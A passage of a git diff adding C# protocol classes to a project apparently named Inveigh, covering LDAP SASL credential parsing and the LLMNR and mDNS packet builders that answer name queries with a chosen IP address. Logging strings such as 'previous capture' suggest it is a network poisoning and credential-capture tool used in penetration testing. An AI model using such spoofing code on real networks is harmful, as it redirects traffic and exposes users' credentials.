SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.Support; +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace Quiddity.LDAP +{ + class LDAPSaslCredentials + { + public string Mechanism { get; set; } + public byte[] Credentials { get; set; } + + public void ReadBytes(byte[] Data) + { + this.Mechanism = Encoding.UTF8.GetString(ASN1.GetTagBytes(4, Data)); + this.Credentials = ASN1.GetTagBytes(4, Data, ASN1.GetLength(1, Data)); + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPSupportedCapabilities.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPSupportedCapabilities.cs new file mode 100644 index 0000000..dd172c6 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPSupportedCapabilities.cs @@ -0,0 +1,55 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.DirectoryServices.Protocols; +using System.Linq; +using System.Text; + +namespace Quiddity.LDAP +{ + class LDAPSupportedCapabilities : LDAPPartialAttributeList + { + + public LDAPSupportedCapabilities() + { + this.Type = "supportedCapabilities"; + this.Vals = new string[] { "1.2.840.113556.1.4.800", "1.2.840.113556.1.4.1670", "1.2.840.113556.1.4.1791", "1.2.840.113556.1.4.1935", "1.2.840.113556.1.4.2080", "1.2.840.113556.1.4.2237" }; + } + + public byte[] Encode() + { + return BerConverter.Encode("{st{v}}", this.Type, 0x31, this.Vals); + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPSupportedSASLMechanisms.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPSupportedSASLMechanisms.cs new file mode 100644 index 0000000..d0ef4b8 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPSupportedSASLMechanisms.cs @@ -0,0 +1,56 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.LDAP; +using System; +using System.Collections.Generic; +using System.DirectoryServices.Protocols; +using System.Linq; +using System.Text; + +namespace Quiddity.LDAP +{ + class LDAPSupportedSASLMechanisms : LDAPPartialAttributeList + { + + public LDAPSupportedSASLMechanisms() + { + this.Type = "supportedSASLMechanisms"; + this.Vals = new string[] { "GSSAPI", "GSS-SPNEGO", "EXTERNAL", "DIGESTMD5" }; + } + + public byte[] Encode() + { + return BerConverter.Encode("{st{v}}", this.Type, 0x31, this.Vals); + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRChecker.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRChecker.cs new file mode 100644 index 0000000..ec071be --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRChecker.cs @@ -0,0 +1,41 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.DNS; + +namespace Quiddity.LLMNR +{ + class LLMNRChecker : DNSChecker + { + + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRHeader.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRHeader.cs new file mode 100644 index 0000000..a64bb05 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRHeader.cs @@ -0,0 +1,130 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.DNS; +using System; + +namespace Quiddity.LLMNR +{ + class LLMNRHeader : DNSHeader + { + // https://tools.ietf.org/html/rfc4795#section-2.1 + + public bool C { get; set; } // 1 bit + public bool T { get; set; } // 1 bit + + public LLMNRHeader() + { + + } + + public LLMNRHeader (byte[] data) + { + ReadBytes(data, 0); + } + + public byte[] GetPacket(uint ttl, string ip, string ipv6, byte[] data, out string name, out string type) + { + this.ReadBytes(data, 0); + name = ""; + type = "A"; + + if (!this.QR) + { + LLMNRQuestion question = new LLMNRQuestion(); + question.ReadBytes(data, 12); + + if (string.Equals(BitConverter.ToString(question.QType), "00-1C")) + { + type = "AAAA"; + ip = ipv6; + } + + LLMNRResource response = new LLMNRResource(); + return response.GetBytes(question, ttl, ip, this.ID); + } + + return null; + } + + + protected override void ReadFlags() + { + string flags = Convert.ToString(BitConverter.ToUInt16(this.Flags, 0), 2).PadLeft(16, '0'); + + if (string.Equals(flags.Substring(0, 1), "1")) + { + this.QR = true; + } + + this.Opcode = flags.Substring(1, 4); + + if (string.Equals(flags.Substring(5, 1), "1")) + { + this.C = true; + } + + if (string.Equals(flags.Substring(6, 1), "1")) + { + this.TC = true; + } + + if (string.Equals(flags.Substring(7, 1), "1")) + { + this.T = true; + } + + this.Z = flags.Substring(8, 4); + this.RCode = flags.Substring(12, 4); + } + + protected override void WriteFlags() + { + string flags = this.QR ? "1" : "0"; + flags += this.Opcode; + flags += this.C ? "1" : "0"; + flags += this.TC ? "1" : "0"; + flags += this.T ? "1" : "0"; + flags += this.Z; + flags += this.RCode; + byte[] bytes = new byte[2]; + + for (int i = 0; i < 2; ++i) + { + bytes[i] = Convert.ToByte(flags.Substring(8 * i, 8), 2); + } + + this.Flags = bytes; + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRPacket.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRPacket.cs new file mode 100644 index 0000000..c103c21 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRPacket.cs @@ -0,0 +1,98 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.LLMNR; +using Quiddity.Support; +using System; +using System.Collections.Generic; +using System.Linq; +using System.Net; +using System.Text; + +namespace Quiddity.LLMNR +{ + class LLMNRPacket + { + public LLMNRHeader Header { get; set; } + public LLMNRQuestion Question { get; set; } + public LLMNRResource Resource { get; set; } + + public LLMNRPacket(byte[] data) + { + ReadBytes(data); + } + + public LLMNRPacket ReadBytes(byte[] data) + { + this.Header = new LLMNRHeader(data); + this.Question = new LLMNRQuestion(data); + return this; + } + + public byte[] GetBytes(uint ttl, string replyIP, string replyIPv6) + { + + if (string.Equals(this.Question.Type, "AAAA") && !String.IsNullOrEmpty(replyIPv6)) + { + replyIP = replyIPv6; + } + + byte[] rdata = IPAddress.Parse(replyIP).GetAddressBytes(); + + this.Header = new LLMNRHeader + { + ID = this.Header.ID, + QR = true, + Opcode = "0000", + C = false, + TC = false, + T = false, + Z = "0000", + RCode = "0000", + QDCount = 1, + ANCount = 1 + }; + + this.Resource = new LLMNRResource + { + Name = this.Question.QName, + Type = this.Question.QType, + Class = this.Question.QClass, + TTL = ttl, + RDLength = (ushort)rdata.Length, + RData = rdata + }; + + return Utilities.BlockCopy(this.Header.GetBytes(), this.Question.GetBytes(), this.Resource.GetBytes()); + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRQuestion.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRQuestion.cs new file mode 100644 index 0000000..b919cd5 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRQuestion.cs @@ -0,0 +1,53 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; +using Quiddity.DNS; + +namespace Quiddity.LLMNR +{ + class LLMNRQuestion : DNSQuestion + { + public LLMNRQuestion() + { + + } + + public LLMNRQuestion(byte[] data) + { + ReadBytes(data, 12); + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRResource.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRResource.cs new file mode 100644 index 0000000..be4f768 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LLMNR/LLMNRResource.cs @@ -0,0 +1,74 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Net; +using System.Text; +using Quiddity.DNS; +using Quiddity.Support; + +namespace Quiddity.LLMNR +{ + class LLMNRResource : DNSResource + { + public byte[] GetBytes(LLMNRQuestion llmnrQuestion, uint TTL, string responseData, byte[] id) + { + byte[] rdata = IPAddress.Parse(responseData).GetAddressBytes(); + + LLMNRHeader responseHeader = new LLMNRHeader + { + ID = id, + QR = true, + Opcode = "0000", + C = false, + TC = false, + T = false, + Z = "0000", + RCode = "0000", + QDCount = 1, + ANCount = 1 + }; + + this.Name = llmnrQuestion.QName; + this.Type = llmnrQuestion.QType; + this.Class = llmnrQuestion.QClass; + this.TTL = TTL; + this.RDLength = (ushort)rdata.Length; + this.RData = rdata; + + return Utilities.BlockCopy(responseHeader.GetBytes(), llmnrQuestion.GetBytes(), this.GetBytes()); + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSChecker.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSChecker.cs new file mode 100644 index 0000000..0e10de5 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSChecker.cs @@ -0,0 +1,84 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.DNS; +using Quiddity.Support; +using System; + +namespace Quiddity.MDNS +{ + class MDNSChecker : DNSChecker + { + public string[] Questions { get; set; } + public string OutputQuestionDenied { get; set; } + + public MDNSChecker() + { + this.OutputReplyAllowed = "response sent"; + this.OutputInspect = "inspect only"; + this.OutputDisabled = "disabled"; + this.OutputHostDenied = "host ignored"; + this.OutputIPDenied = "IP ignored"; + this.OutputTypeDenied = "type ignored"; + this.OutputServiceDenied = "service ignored"; + this.OutputRepeat = "previous capture"; + this.OutputQuestionDenied = "question type ignored"; + } + + public virtual bool Check(string name, string question, string type, string clientIP) + { + + if (!Check(name, type, clientIP)) + { + return false; + } + else if (!QuestionIsAllowed(question)) + { + this.OutputMessage = this.OutputQuestionDenied; + return false; + } + + return true; + } + + public bool QuestionIsAllowed(string question) + { + + if (!Utilities.ArrayIsNullOrEmpty(this.Questions) && !Array.Exists(this.Questions, element => element == question.ToUpper())) + { + return false; + } + + return true; + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSHeader.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSHeader.cs new file mode 100644 index 0000000..3d86d5a --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSHeader.cs @@ -0,0 +1,124 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; +using Quiddity.DNS; + +namespace Quiddity.MDNS +{ + class MDNSHeader : DNSHeader + { + public bool AD { get; set; } // 1 bit + public bool CD { get; set; } // 1 bit + + public MDNSHeader() + { + + } + + public MDNSHeader(byte[] data) + { + ReadBytes(data, 0); + } + + protected override void ReadFlags() + { + string flags = Convert.ToString(BitConverter.ToUInt16(this.Flags, 0), 2).PadLeft(16, '0'); + + if (string.Equals(flags.Substring(0, 1), "1")) + { + this.QR = true; + } + + this.Opcode = flags.Substring(1, 4); + + if (string.Equals(flags.Substring(5, 1), "1")) + { + this.AA = true; + } + + if (string.Equals(flags.Substring(6, 1), "1")) + { + this.TC = true; + } + + if (string.Equals(flags.Substring(7, 1), "1")) + { + this.RD = true; + } + + if (string.Equals(flags.Substring(8, 1), "1")) + { + this.RA = true; + } + + this.Z = flags.Substring(9, 1); + + if (string.Equals(flags.Substring(10, 1), "1")) + { + this.AD = true; + } + + if (string.Equals(flags.Substring(11, 1), "1")) + { + this.CD = true; + } + + this.RCode = flags.Substring(12, 4); + } + + protected override void WriteFlags() + { + string flags = this.QR ? "1" : "0"; + flags += this.Opcode; + flags += this.AA ? "1" : "0"; + flags += this.TC ? "1" : "0"; + flags += this.RD ? "1" : "0"; + flags += this.RA ? "1" : "0"; + flags += this.Z; + flags += this.AD ? "1" : "0"; + flags += this.CD ? "1" : "0"; + flags += this.RCode; + byte[] bytes = new byte[2]; + + for (int i = 0; i < 2; ++i) + { + bytes[i] = Convert.ToByte(flags.Substring(8 * i, 8), 2); + } + + this.Flags = bytes; + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSPacket.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSPacket.cs new file mode 100644 index 0000000..a7a8543 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSPacket.cs @@ -0,0 +1,99 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.Support; +using System; +using System.Collections.Generic; +using System.Linq; +using System.Net; +using System.Text; + +namespace Quiddity.MDNS +{ + class MDNSPacket + { + public MDNSHeader Header { get; set; } + public MDNSQuestion Question { get; set; } + public MDNSResource Resource { get; set; } + public MDNSPacket(byte[] data) + { + ReadBytes(data); + } + + public MDNSPacket ReadBytes(byte[] data) + { + this.Header = new MDNSHeader(data); + this.Question = new MDNSQuestion(data); + return this; + } + + public byte[] GetBytes(uint ttl, string replyIP, string replyIPv6) + { + + if (string.Equals(this.Question.Type, "AAAA") && !String.IsNullOrEmpty(replyIPv6)) + { + replyIP = replyIPv6; + } + + byte[] rdata = IPAddress.Parse(replyIP).GetAddressBytes(); + + this.Header = new MDNSHeader + { + ID = this.Header.ID, + QR = true, + Opcode = "0000", + AA = true, + TC = false, + RD = false, + RA = false, + Z = "0", + AD = false, + CD = false, + RCode = "0000", + QDCount = 1, + ANCount = 1 + }; + + 